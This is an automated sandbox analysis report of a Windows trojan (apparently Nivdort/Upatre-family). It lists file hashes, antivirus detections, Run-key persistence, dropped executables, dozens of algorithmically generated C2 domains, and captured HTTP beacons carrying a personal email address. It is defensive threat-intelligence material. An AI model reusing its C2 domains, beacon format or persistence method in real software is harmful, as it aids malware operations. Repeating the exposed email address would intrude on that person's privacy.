Analysis Date2015-08-30 09:13:03
MD552f3c8322068b2b06d40046c66263271
SHA1e0eb428e9477e6bb372cc5fa18ddd97f370f24e8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e2e52efd39a91a892440a6a72c1ba150 sha1: dfaf3f8eef36186a44df79d8c212a22b0a1bb3f0 size: 292864
Section.rdata md5: 530649f44cd3e0ae41291c1fec5f00c0 sha1: 30fb8f699c354012cccaffa2335060bd238600c4 size: 35328
Section.data md5: 7c927fb57012d9c5d78da69a52ce8c88 sha1: d990d44a6087d181f632e94eec9354fe96c80163 size: 97792
Timestamp2014-10-30 10:27:04
PackerMicrosoft Visual C++ ?.?
PEhash9b869a75080d0c56ea2ca6ab24348e599213f371
IMPhashe48e759688f08e0b9a16ad5f13f5f901
AVCA (E-Trust Ino)Win32/Tnega.XAXY!suspicious
AVRisingno_virus
AVMcafeeTrojan-FEMT!52F3C8322068
AVAvira (antivir)TR/ATRAPS.Gen2
AVTwisterno_virus
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004938ec1 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!Trojan.Agent.Win32.544757
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FORUCON.BMC
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader12.8822
AVF-SecureGen:Variant.Symmi.22722

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Instrumentation Panel Health Log ➝
C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.g8tpd
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\aumpacvrxzp.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe"

Network Details:

DNSdoctorwhite.net
Type: A
157.112.152.45
DNSmelbourneit.hotkeysparking.com
Type: A
8.5.1.16
DNSdoublepleasure.net
Type: A
184.168.221.104
DNSdesirewhite.net
Type: A
93.115.38.30
DNSstrengthwhite.net
Type: A
95.211.230.75
DNSstillwhite.net
Type: A
112.125.17.103
DNSbuildingheart.net
Type: A
184.168.221.38
DNSstorebattle.net
Type: A
141.8.224.169
DNSprettyperfect.net
Type: A
174.120.222.114
DNSbuildingtoward.net
Type: A
DNSeveningtoward.net
Type: A
DNSbuildingpleasure.net
Type: A
DNSeveningpleasure.net
Type: A
DNSbuildingmillion.net
Type: A
DNSeveningmillion.net
Type: A
DNSbuildingwhite.net
Type: A
DNSeveningwhite.net
Type: A
DNSstoretoward.net
Type: A
DNSmighttoward.net
Type: A
DNSstorepleasure.net
Type: A
DNSmightpleasure.net
Type: A
DNSstoremillion.net
Type: A
DNSmightmillion.net
Type: A
DNSstorewhite.net
Type: A
DNSmightwhite.net
Type: A
DNSdoctortoward.net
Type: A
DNSprettytoward.net
Type: A
DNSdoctorpleasure.net
Type: A
DNSprettypleasure.net
Type: A
DNSdoctormillion.net
Type: A
DNSprettymillion.net
Type: A
DNSprettywhite.net
Type: A
DNSfellowtoward.net
Type: A
DNSdoubletoward.net
Type: A
DNSfellowpleasure.net
Type: A
DNSfellowmillion.net
Type: A
DNSdoublemillion.net
Type: A
DNSfellowwhite.net
Type: A
DNSdoublewhite.net
Type: A
DNSbrokentoward.net
Type: A
DNSresulttoward.net
Type: A
DNSbrokenpleasure.net
Type: A
DNSresultpleasure.net
Type: A
DNSbrokenmillion.net
Type: A
DNSresultmillion.net
Type: A
DNSbrokenwhite.net
Type: A
DNSresultwhite.net
Type: A
DNSpreparetoward.net
Type: A
DNSdesiretoward.net
Type: A
DNSpreparepleasure.net
Type: A
DNSdesirepleasure.net
Type: A
DNSpreparemillion.net
Type: A
DNSdesiremillion.net
Type: A
DNSpreparewhite.net
Type: A
DNSstrengthtoward.net
Type: A
DNSstilltoward.net
Type: A
DNSstrengthpleasure.net
Type: A
DNSstillpleasure.net
Type: A
DNSstrengthmillion.net
Type: A
DNSstillmillion.net
Type: A
DNSmovementheart.net
Type: A
DNSoutsideheart.net
Type: A
DNSmovementperfect.net
Type: A
DNSoutsideperfect.net
Type: A
DNSmovementmayor.net
Type: A
DNSoutsidemayor.net
Type: A
DNSmovementbattle.net
Type: A
DNSoutsidebattle.net
Type: A
DNSeveningheart.net
Type: A
DNSbuildingperfect.net
Type: A
DNSeveningperfect.net
Type: A
DNSbuildingmayor.net
Type: A
DNSeveningmayor.net
Type: A
DNSbuildingbattle.net
Type: A
DNSeveningbattle.net
Type: A
DNSstoreheart.net
Type: A
DNSmightheart.net
Type: A
DNSstoreperfect.net
Type: A
DNSmightperfect.net
Type: A
DNSstoremayor.net
Type: A
DNSmightmayor.net
Type: A
DNSmightbattle.net
Type: A
DNSdoctorheart.net
Type: A
DNSprettyheart.net
Type: A
DNSdoctorperfect.net
Type: A
DNSdoctormayor.net
Type: A
HTTP GEThttp://doctorwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://doubletoward.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://doublepleasure.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://desirewhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://strengthwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://stillwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://buildingheart.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://storebattle.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
HTTP GEThttp://prettyperfect.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 157.112.152.45:80
Flows TCP192.168.1.1:1032 ➝ 8.5.1.16:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.104:80
Flows TCP192.168.1.1:1034 ➝ 93.115.38.30:80
Flows TCP192.168.1.1:1035 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1036 ➝ 112.125.17.103:80
Flows TCP192.168.1.1:1037 ➝ 184.168.221.38:80
Flows TCP192.168.1.1:1038 ➝ 141.8.224.169:80
Flows TCP192.168.1.1:1039 ➝ 174.120.222.114:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20646f 63746f72 77686974 652e6e65   : doctorwhite.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20646f 75626c65 746f7761 72642e6e   : doubletoward.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20646f 75626c65 706c6561 73757265   : doublepleasure
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206465 73697265 77686974 652e6e65   : desirewhite.ne
0x00000080 (00128)   740d0a0d 0a0a0d0a                     t.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 72656e67 74687768 6974652e   : strengthwhite.
0x00000080 (00128)   6e65740d 0a0d0a0a                     net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 696c6c77 68697465 2e6e6574   : stillwhite.net
0x00000080 (00128)   0d0a0d0a 0a0d0a0a                     ........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206275 696c6469 6e676865 6172742e   : buildingheart.
0x00000080 (00128)   6e65740d 0a0d0a0a                     net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207374 6f726562 6174746c 652e6e65   : storebattle.ne
0x00000080 (00128)   740d0a0d 0a0d0a0a                     t.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c6165 2e737461   mail=nicolae.sta
0x00000020 (00032)   6e407468 65726d6f 64657369 676e2e72   n@thermodesign.r
0x00000030 (00048)   6f266d65 74686f64 3d706f73 74266c65   o&method=post&le
0x00000040 (00064)   6e204854 54502f31 2e300d0a 41636365   n HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207072 65747479 70657266 6563742e   : prettyperfect.
0x00000080 (00128)   6e65740d 0a0d0a0a                     net.....


Strings